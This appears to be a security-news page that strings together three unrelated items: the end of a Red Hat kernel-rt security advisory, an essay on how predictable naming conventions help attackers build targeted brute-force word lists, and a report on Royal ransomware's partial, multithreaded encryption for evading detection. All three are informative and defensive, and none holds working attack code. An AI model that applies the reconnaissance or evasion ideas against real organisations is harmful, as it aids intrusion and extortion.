* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z5 Batch  
(BZ#2137580)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12  
[kernel-rt] (BZ#2139864)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j98NzjgjWX9erEAQgJMg//YsMeDDnxaD5147QWtdvcUXAEPUwgTclc  
q1S5Csnsli/lgNjEJxENBGin22RzGKBue9dl7BbKUQMTTYyrzZcnY75g7J6/tOzw  
UmhtxESE7Zge4ghgHtuTRpG5QEWvh73SYfFUyeIwby0QM6ONJX2nXViA88JXrnke  
Eggo5lSUOBjhvJZgWfx8VSCBWjshMdy7Lin0B+gGQuaQCumacHxNPNaHM/11j7bg  
2PXxqjleqhD1eyGfj9W1REd4HiE+6WYKT4OS3mPDESbv7lbEVMOxGgi0dBbt6JI3  
m8/bqoMh48fEAlf7H0UWw9/R/mY7zY2UMsAj10RHXMSeNr/QkNxzxNIJ7SYFU13C  
EKMEnUw/vS4JWET/JUgrsxu08sP9oD3IwQtPTJWTrq/mhBUdHlYjxkZADtk03XHk  
Y7GXVNeJe66XnJACQnlHuWtqTE6WidbM30Rc3wI0SAfx0hcYAPgoGfQWX7EFTp8s  
UlMyN7wd8qGbceNw6uk/k3rPcWW3EGeNw6HsUhN9eIVdRBBnlAk/i/O5ofShSYRr  
jctm+3T/7x04oFGJFo56wNfkyTy8W6Lj4Oxr7us7cJFJBW5l+T52re3XtIA0Uaib  
An7Ka+5uBvmooYnCQJyR4qnpNXB+Csdav+vOfrT5EKVvh33YlyB0O792J9EGqgSB  
CW+f3k/Ec3g=  
=3xRb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8974-01

Learn to think three moves ahead of hackers so you're playing chess, not checkers. Instead of reacting to opponents' moves, be strategic, and disrupt expected patterns of vulnerability.

Many an article chronicles hacked passwords available in bulk on the evil "Dark Web." It's presented as evidence that the bad behavior of users is the root of all hacking. But as a former red teamer, the end user isn't the only one who is a prisoner to discernable behavioral patterns.

There is a "pattern of vulnerability" in human behavior extending far beyond end users into more complex IT functions. Finding evidence of these patterns can give hackers an upper hand and speed the timeline of compromise.

It's a reality I recognized earlier in my career in operational roles. I've physically helped rebuild and relocate data centers and rewire buildings from top to bottom. It gave me a great perspective of what it takes to build in security from scratch, and how unconscious behaviors and preferences can put it all at risk. In fact, understanding how to identify these patterns gave me a very reliable "superpower" when I moved into red teaming, which ultimately resulted in a patent grant. But more on that later.

**Fatal Recall**

Let's start by examining how our addiction to patterns betrays us — from credentials, to software operation, to asset naming.

While technology has afforded us so many benefits, the complexity of managing it — and the cumbersome controls intended to protect — drives people to repeatable patterns and the comfort of familiarity. The more regular the task or function becomes, the more complacent we get with the pattern and what it telegraphs. For a red teamer, the ability to watch routines, from the physical to the logical, can offer a wealth of intelligence. Repeatability offers opportunity and time to discern patterns, and then to find the vulnerability in those patterns that can be exploited.

Internal naming schemes in particular — be they asset names, system names, or credential groupings — lend themselves to picking common words for descriptive categorization. I saw one organization that used the names of mountains. And while you may not know which system K2 versus Denali is, it acts as a filter for an attacker as they explore an environment. It's also an excellent social engineering tool, allowing an attacker to "speak the internal IT lingo." You may ask, OK, but "what's in a name?"

**Brutal Reality**

I'm sure you've heard of brute-force attacks where attackers throw guesses in volume at a target to find the right combination that leads to access. It's a numbers game and a blunt instrument. However, if you can discern the use of naming conventions, it sharpens the ability to focus on a range of accounts or systems, and then understand their potential attributes. It speeds up the clock for an attacker.

But, you ask, "if these are _internal_ conventions, how does an _external_ attacker even find this type of information"?

**Patently True**

Enter my aforementioned superpower. As any experienced red teamer knows, information leaks out of organizations in many ways, you just need to know where to look, and how to find the signals in the noise.

Internal naming groups and conventions become exposed to the outside world in a variety of ways. They're buried in website code, detailed in technical documentation or as part of APIs, or just simply published in public system information.

Admittedly, this is a very large haystack, but finding the needles is exactly what the patent I was involved in (US Patent 10,515,219) endeavors to do. Site-scanning tools collect a range of information, and unsurprisingly, an overload of information. My approach strips out all the technical programming information (such as markup, JavaScript, etc.), and leaves just words. It then compares results with lists of English words. The algorithm then identifies groupings of words or abbreviations _not_ present in the selected language that, presumably, _may_ signify an internal naming convention or credentials. As is common with brute-force campaigns, it may not, but as the axiom goes, the attacker only needs to be right _once,_ so the ability to generate context-sensitive word lists may make or break your next campaign. This is when the picture may start to become clearer and the shape of things such as user groups, system names, etc., manifest.

**Actions Speak Louder**

So, we've established how our deeply rooted behaviors can betray our security literally with "writing on the wall." How do we change, or at least be more aware of, our very nature?

There's the old joke summed up in the punch line that you don't need to outrun a tiger — you just need to outrun your companions. In this way, **first use the basic "sneaker" technologies**. Password managers, multifactor authentication (MFA), and the like at least allow you to outrun your peers so attackers can focus on the laggards in the herd.

**Second, elect for regular change.** Change is uncomfortable, but that discomfort triggers better situational awareness. If you know yourself and your environment better, and force change, that helps prevent an attacker's ability to get to know you too well.

**Next, trust your gut**. If something doesn't seem right, it probably isn't. If you focus on failure and not the familiarity of the behavior around failure, you're better equipped to see the bad guys coming and make sure a small anomaly doesn't become a big problem.

**Finally, play chess, not checkers**. Too many organizations think they're playing chess, and may be employing more complex pieces and roles, but if, ultimately, you're playing in reaction to your opponents' moves, it's checkers in disguise.

It's a lesson I am teaching my own son while he's interested in learning chess. He's learning the _strategy_ behind the game. He understands using the pieces and their characteristics to manipulate the game, and is quickly catching on to the fact that he also needs to focus on manipulating _me_. I'm teaching him to think three moves ahead, think about what is possible, and lure his opponent into doing what he wants them to do, not what they want to do — and, most importantly, to trust the gambit.

How Our Behavioral Bad Habits Are a Community Trait and Security Problem

An emerging cybercriminal group linked with Conti has expanded its partial encryption strategy and demonstrates other evasive maneuvers, as it takes aim at healthcare and other sectors.

The Royal ransomware gang has quickly risen to the top of the ransomware food chain, demonstrating sophisticated tactics — including partial and rapid encryption — that researchers believe may reflect the years of experience its members honed as leaders of the now-defunct Conti Group.

Royal ransomware operates around the world, and reportedly on its own; it does not appear that the group uses affiliates through ransomware-as-a-service (RaaS) or to target a specific sector or country. The group is known to make ransom demands of up to $2 million and claims to have published 100% of the data it extracts from its victims.

A deeper dive into how the Royal ransomware group works shows a surefooted and innovative group with varied ways to deploy ransomware and evade detection so it can do significant damage before victims have a chance to respond, researchers from the Cybereason Security Research & Global SOC Team revealed in a blog post published Dec. 14.

One key aspect of Royal's tactics is the concept of partial encryption, where it locks up only a predetermined portion of file content rather than all of it. While partial encryption is not a new tactic, it is key to Royal's strategy, with the group taking it to a new level not seen much before in ransomware activity, the researchers said.

Recently, for instance, Royal has expanded the idea by basing the tactic on flexible-percentage encryption that can be tailored to the target, thus making detection more challenging, the Cybereason researchers said.

The group also employs multiple threads to accelerate the encryption process, giving victims less time to stop it once it starts, and the encryption also initially starts and deploys in different ways, which also makes detection challenging, according to Cybereason.

**Taking the Crown as a Rapidly Evolving Threat**

The US Department of Health and Human Services sounded an alarm last week about Royal ransomware specifically targeting the healthcare sector; however, the group has been active since early this year and appears agnostic when it comes to its victims, the researchers noted.

"The group does not seem to focus on a specific sector, and its victims vary from industrial companies to insurance companies, and more," the Cybereason researchers wrote.

While Royal began its activity by deploying other types of ransomware, by September the rapidly evolving cybercriminal group had developed its own. And by November, Royal ransomware was reported to be the most prolific ransomware in the e-crime landscape, dethroning the dominant Lockbit for the first time in more than a year, the researchers said.

And even though Royal sets its sites on a diverse range of victims, its targeting of the healthcare sector demonstrates that the group is likely as ruthless as Conti was before it, noted one security expert.

"While some larger ransomware gangs have demonstrated scruples at either avoiding targeting healthcare institutions or providing decryption keys at no cost, it's clear that is not the case when it comes to Royal ransomware," says Shawn Surber, senior director of technical account management at Tanium, a converged endpoint management provider.

Targeting the healthcare industry could literally mean life or death for some of those affected by a ransomware attack, given that it can prevent clinicians from having access to key patient data, he says. This sector also tends to have a dearth of cybersecurity funds to defend itself against ransomware and other cyber threats, making it especially vulnerable, Surber says.

"This is especially concerning considering virtually any outage or disruption in operations will cause a financial — and often physical — impact in a patient care setting," he says.

**A New Twist on Partial Encryption**

While most ransomware bases partial encryption only on the file size, then encrypts a set percentage of the file the same way each time, Royal ransomware lets the operator choose a specific percentage and lower the amount of encrypted data even if the file size is large, the researchers said.

When a targeted file is being encrypted, the ransomware calculates the percentage to encrypt and divides the file content — encrypted and unencrypted — into equal segments, researchers explained in the post. The fragmentation — and thus the low percentage of encrypted file content that results — lowers the chance of being detected by anti-ransomware solutions.

"This ability to change the amount of the file to be encrypted gives Royal ransomware an advantage when it comes to evading detection by security products," the researchers noted.

The file size that Royal chooses for its partial encryption threshold — 5.24MB — also is the same as what Conti Group used in the past, encrypting 50% of a file in a divided manner if it was over this size, "much like Royal ransomware," the researchers wrote.

Though it's widely believed that Conti's former operators are behind Royal, this similarity is not strong enough evidence to confirm that link definitively, the researchers added.

Another technique unique to Royal is how it multithreads encryption, choosing the number of running threads by using the API call _GetNativeSystemInfo_ to collect the number of processors in a machine, the researchers divulged. It will then multiply the result by two and create the appropriate number of threads accordingly. This allows for rapid encryption, another show of sophistication by the group, the researchers said.

**Shielding the Enterprise From a Royal Threat**

To avoid rolling out the red carpet for Royal and other ransomware, researchers recommend that enterprises deploy a multilayer approach to malware protection that leverages threat intelligence, machine learning, anti-ransomware, next-generation antivirus, and variant payload-prevention capabilities.

For healthcare organizations with limited cybersecurity resources that may not have such tools in their arsenal, one security expert advised the adoption of low-code security automation to help detect and respond to threats in real time by allowing complete visibility into IT environments.

_"_Endpoint security tools that integrate low-code security automation give healthcare organizations a cohesive protection strategy that protects patients and employees from data theft and extortion," Daniel Selig, security automation architect at security automation provider Swimlane, tells Dark Reading.

Tag

#intel